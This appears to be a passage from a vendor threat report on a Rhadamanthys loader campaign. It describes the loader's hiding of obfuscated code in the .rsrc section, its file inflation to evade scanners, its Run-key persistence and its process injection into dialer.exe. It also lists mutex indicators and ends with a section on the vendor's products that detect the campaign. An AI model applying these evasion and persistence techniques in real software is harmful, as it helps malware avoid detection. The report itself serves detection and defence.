We observed the Rhadamanthys loader in this campaign contains 10 sections in its binary structure. Despite the presence of multiple sections, the threat actor specifically targets the .rsrc section to insert the malicious code. This section is heavily obfuscated to conceal the malicious activities and make analyses more challenging. The choice of the .rsrc section is strategic, as it is typically associated with resource data like icons and menus, making it less likely to raise immediate suspicion.  

The loader of Rhadamanthys binary structure sections. 

After analysis, we discovered that the Rhadamanthys loader employs several sophisticated techniques to ensure its persistence and evasion. Initially, the loader copies itself and writes the file to “C:\\Users\\\[user\]\\Documents\\lumuiUpdater\\ffUpdaar.exe”. In order to avoid detection by antivirus programs and sandbox environments, it expands the file size to over 700 MB. This significant increase in file size is intended to bypass heuristic and signature-based detection mechanisms commonly used by security products, which may struggle to process such large files effectively. 

The loader copies itself to the lumuiUpdater folder. 

Furthermore, the loader is configured to start automatically by modifying the Windows Registry. It writes an entry to “HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run” and key name value “sausageLoop”, a registry key that specifies programs to be launched during the system startup. This registry modification ensures that the malicious loader is executed every time the victim's computer restarts, thereby maintaining its persistence on the infected system. 

The loader is configured to start automatically. 

Finally, the loader executes the legitimate system process "%Systemroot%\\system32\\dialer.exe" and injects Rhadamanthys' payload into it. This process injection technique allows the malware to run its malicious code within the context of a legitimate system process, further evading detection. Additionally, it uses mutex objects to ensure that only one instance of the malware runs on the infected host. Below is the list of mutex names we observed in this campaign, which has also been disclosed in previous reporting by other. 

*   Global\\MSCTF.Asm.{04fb3f26-9d18-66b5-6862-7b8a85e4b620} 
*   Session\\1\\MSCTF.Asm.{04fb3f26-9d18-66b5-6862-7b8a85e4b620} 
*   Session\\2\\MSCTF.Asm.{04fb3f26-9d18-66b5-6862-7b8a85e4b620} 
*   Session\\3\\MSCTF.Asm.{04fb3f26-9d18-66b5-6862-7b8a85e4b620} 
*   Session\\4\\MSCTF.Asm.{04fb3f26-9d18-66b5-6862-7b8a85e4b620} 
*   Session\\5\\MSCTF.Asm.{04fb3f26-9d18-66b5-6862-7b8a85e4b620} 
*   Session\\6\\MSCTF.Asm.{04fb3f26-9d18-66b5-6862-7b8a85e4b620} 
*   Session\\7\\MSCTF.Asm.{04fb3f26-9d18-66b5-6862-7b8a85e4b620} 
*   Session\\8\\MSCTF.Asm.{04fb3f26-9d18-66b5-6862-7b8a85e4b620} 

**Coverage **

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here. 

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protection with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 64167-64169. 

**IOC **

IOCs for this research can also be found at our GitHub repository here.

Tag

#auth